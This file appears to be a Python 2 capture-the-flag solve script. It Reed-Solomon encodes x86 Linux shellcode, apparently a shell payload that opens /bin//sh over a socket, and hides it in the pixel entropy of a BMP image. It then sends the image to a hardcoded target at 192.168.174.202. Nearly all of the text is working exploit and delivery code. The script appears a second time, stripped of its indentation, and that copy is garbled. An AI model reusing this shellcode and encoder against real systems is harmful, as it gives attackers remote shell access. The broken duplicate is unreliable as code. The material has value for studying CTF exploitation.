potetisensei/solve.py

## solve.py
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack

shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
rs = RSCodec(17)

encoded_shellcode = ""
for i in range(0, len(shellcode), 16):
    encoded_shellcode += rs.encode(shellcode[i:i+15])

encoded_shellcode = rs.encode(list("MARK" + pack("<I", len(encoded_shellcode)) + "\x90" * 5 + "\xEB\x01")) + encoded_shellcode
encoded_shellcode = str(encoded_shellcode)

high_entropy = [[30, 28, 174, 118, 106, 199, 58, 101], [229, 76, 74, 135, 244, 246, 236, 186], [110, 68, 37, 185, 14, 193, 240, 123], [87, 94, 201, 202, 63, 126, 61, 60], [123, 125, 104, 157, 173, 218, 45, 203], [147, 203, 191, 59, 149, 206, 179, 187], [176, 184, 248, 45, 82, 41, 176, 209], [20, 28, 31, 195, 133, 167, 35, 242]]

width = 512
height = 512

def increase_entropy_RGB(pix, x, y, RGB):
    times = 0
    for i in range(8):
        for j in range(8):
            R, G, B = pix[x+j, y+i]

            if RGB & 0b100:
                R = high_entropy[i][j]
                times += 1

            if RGB & 0b010:
                G = high_entropy[i][j]
                times += 1

            if RGB & 0b001:
                B = high_entropy[i][j]
                times += 1

            pix[x+j, y+i] = (R, G, B)

    return times / 64

def make_bits(string):
    bins = "".join(["0"*(8-len(bin(ord(i))[2:])) + bin(ord(i))[2:] for i in string])
    return [int(i) for i in bins]

def add_bit(pix, x, y, RGB, bit):
    dic = {0:0b100, 1:0b010, 2:0b001}

    if bit == 0:
        return

    return increase_entropy_RGB(pix, x, y, dic[RGB])

def make_payload(pix, width, height, string):
    count = 0
    pos = 0
    RGB = 0
    bit_sequence = make_bits(string)

    for i in range(0, height, 8):
        if pos >= len(bit_sequence):
            break

        for j in range(0, width, 8):
            if pos >= len(bit_sequence):
                break

            else:
                for k in range(3):
                    if pos >= len(bit_sequence):
                        break
                    add_bit(pix, j, i, RGB, bit_sequence[pos])

                    pos += 1
                    RGB = (RGB + 1) % 3
                    count += 1

img = Image.new('RGB', (width, height), (255, 255, 255))
pix = img.load()

make_payload(pix, width, height, encoded_shellcode)

img.save("solve.bmp")

shellcode_pic = open("solve.bmp").read()

sock = socket(AF_INET, SOCK_STREAM)
sock.connect(("192.168.174.202", 12345))

sock.send(shellcode_pic)
print sock.recv(1024)
	from PIL import Image
	from socket import *
	from random import randint
	from reedsolo import RSCodec
	from struct import pack

	shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
	rs = RSCodec(17)

	encoded_shellcode = ""
	for i in range(0, len(shellcode), 16):
	encoded_shellcode += rs.encode(shellcode[i:i+15])

	encoded_shellcode = rs.encode(list("MARK" + pack("<I", len(encoded_shellcode)) + "\x90" * 5 + "\xEB\x01")) + encoded_shellcode
	encoded_shellcode = str(encoded_shellcode)

	high_entropy = [[30, 28, 174, 118, 106, 199, 58, 101], [229, 76, 74, 135, 244, 246, 236, 186], [110, 68, 37, 185, 14, 193, 240, 123], [87, 94, 201, 202, 63, 126, 61, 60], [123, 125, 104, 157, 173, 218, 45, 203], [147, 203, 191, 59, 149, 206, 179, 187], [176, 184, 248, 45, 82, 41, 176, 209], [20, 28, 31, 195, 133, 167, 35, 242]]

	width = 512
	height = 512

	def increase_entropy_RGB(pix, x, y, RGB):
	times = 0
	for i in range(8):
	for j in range(8):
	R, G, B = pix[x+j, y+i]

	if RGB & 0b100:
	R = high_entropy[i][j]
	times += 1

	if RGB & 0b010:
	G = high_entropy[i][j]
	times += 1

	if RGB & 0b001:
	B = high_entropy[i][j]
	times += 1

	pix[x+j, y+i] = (R, G, B)

	return times / 64

	def make_bits(string):
	bins = "".join(["0"*(8-len(bin(ord(i))[2:])) + bin(ord(i))[2:] for i in string])
	return [int(i) for i in bins]

	def add_bit(pix, x, y, RGB, bit):
	dic = {0:0b100, 1:0b010, 2:0b001}

	if bit == 0:
	return

	return increase_entropy_RGB(pix, x, y, dic[RGB])

	def make_payload(pix, width, height, string):
	count = 0
	pos = 0
	RGB = 0
	bit_sequence = make_bits(string)

	for i in range(0, height, 8):
	if pos >= len(bit_sequence):
	break

	for j in range(0, width, 8):
	if pos >= len(bit_sequence):
	break

	else:
	for k in range(3):
	if pos >= len(bit_sequence):
	break
	add_bit(pix, j, i, RGB, bit_sequence[pos])

	pos += 1
	RGB = (RGB + 1) % 3
	count += 1

	img = Image.new('RGB', (width, height), (255, 255, 255))
	pix = img.load()

	make_payload(pix, width, height, encoded_shellcode)

	img.save("solve.bmp")

	shellcode_pic = open("solve.bmp").read()

	sock = socket(AF_INET, SOCK_STREAM)
	sock.connect(("192.168.174.202", 12345))

	sock.send(shellcode_pic)
	print sock.recv(1024)